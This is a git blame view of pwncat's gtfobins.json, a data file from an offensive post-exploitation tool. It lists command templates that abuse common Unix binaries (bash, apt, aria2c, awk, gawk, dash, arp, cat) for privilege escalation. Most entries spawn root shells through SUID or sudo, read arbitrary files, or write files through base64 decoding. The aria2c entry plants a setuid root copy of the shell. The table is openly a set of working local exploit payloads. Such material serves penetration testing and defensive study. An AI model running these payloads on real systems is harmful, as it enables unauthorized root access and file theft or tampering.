Saverr/pwncat
1
0
Fork 0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-24 01:25:37 +01:00
Code Projects Releases Wiki Activity
2d65544b77
pwncat/data/gtfobins.json

96 lines
2.2 KiB
JSON
Raw Normal View History

Added abstract gtfobins interface
2020-05-09 06:49:38 +02:00
[
{
"name": "bash",
Added sudo awareness to gtfobins and updated privesc/sudo to understand the new interface. Sudo now supports wildcard listings and can intelligently parse whether a privesc is possible.
2020-05-09 21:02:04 +02:00
"shell": {
"script": "{command}",
"suid": ["-p"]
},
Added abstract gtfobins interface
2020-05-09 06:49:38 +02:00
"read_file": "{path} -p -c \"cat {lfile}\"",
"write_file": {
"type": "base64",
"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
},
"command": "{path} -p -c {command}"
Added lots of dirty sudo privesc code. It works!
2020-05-09 09:28:58 +02:00
},
{
"name": "apt-get",
"shell": {
Added sudo awareness to gtfobins and updated privesc/sudo to understand the new interface. Sudo now supports wildcard listings and can intelligently parse whether a privesc is possible.
2020-05-09 21:02:04 +02:00
"need": ["changelog", "apt"],
Added lots of dirty sudo privesc code. It works!
2020-05-09 09:28:58 +02:00
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
},
{
"name": "apt",
"shell": {
Added sudo awareness to gtfobins and updated privesc/sudo to understand the new interface. Sudo now supports wildcard listings and can intelligently parse whether a privesc is possible.
2020-05-09 21:02:04 +02:00
"need": ["changelog", "apt"],
Added lots of dirty sudo privesc code. It works!
2020-05-09 09:28:58 +02:00
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
},
{
"name": "aria2c",
Added sudo awareness to gtfobins and updated privesc/sudo to understand the new interface. Sudo now supports wildcard listings and can intelligently parse whether a privesc is possible.
2020-05-09 21:02:04 +02:00
"shell": {
"script": "TF=$(mktemp); SHELL=$(mktemp); cp {shell} $SHELL; echo \"chown root:root $SHELL; chmod +sx $SHELL;\" > $TF;chmod +x $TF; {command}; sleep 1; $SHELL -p",
"need": ["--on-download-error=$TF","http://x"]
}
Added privesc read capability! Only somewhat tested...
2020-05-09 23:05:18 +02:00
},
{
"name": "cat",
"read_file": "{path} {lfile}"
Added "safe" property to gtfobins and started to add more GTFObins
2020-05-10 00:36:51 +02:00
},
{
"name": "arp",
"read_file": "{path} -v -f {lfile} 2>&1 | while read line; do substring=\"\"; if ! test \"${{line#*arp}}\" != \"$line\"; then echo ${{line#>> }}; fi; done",
"safe":false
},
{
"name": "ash",
"shell": {
"script": "{command}",
"suid": ["-p"]
},
"read_file": "{path} -p -c \"cat {lfile}\"",
"write_file": {
"type": "base64",
"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
},
"command": "{path} -p -c {command}"
},
Added new GTFObins entries
2020-05-10 01:00:15 +02:00
{
"name": "awk",
"shell": {
"script": "{command} 'BEGIN {{system(\"/bin/sh\")}}'"
},
"read_file": "{path} '//' {lfile}",
"write_file": {
"type": "base64",
"payload": "{path} -v LFILE={lfile} 'BEGIN {{ \"echo \\\"{data}\\\" | base64 -d\" | getline x ; print x > LFILE }}'"
}
},
{
"name": "gawk",
"shell": {
"script": "{command} 'BEGIN {{system(\"/bin/sh\")}}'"
},
"read_file": "{path} '//' {lfile}",
"write_file": {
"type": "base64",
"payload": "{path} -v LFILE={lfile} 'BEGIN {{ \"echo \\\"{data}\\\" | base64 -d\" | getline x ; print x > LFILE }}'"
}
},
Added "safe" property to gtfobins and started to add more GTFObins
2020-05-10 00:36:51 +02:00
{
"name": "dash",
"shell": {
"script": "{command}",
"suid": ["-p"]
},
"read_file": "{path} -p -c \"cat {lfile}\"",
"write_file": {
"type": "base64",
"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
},
"command": "{path} -p -c {command}"
Added abstract gtfobins interface
2020-05-09 06:49:38 +02:00
}
]
Copy Permalink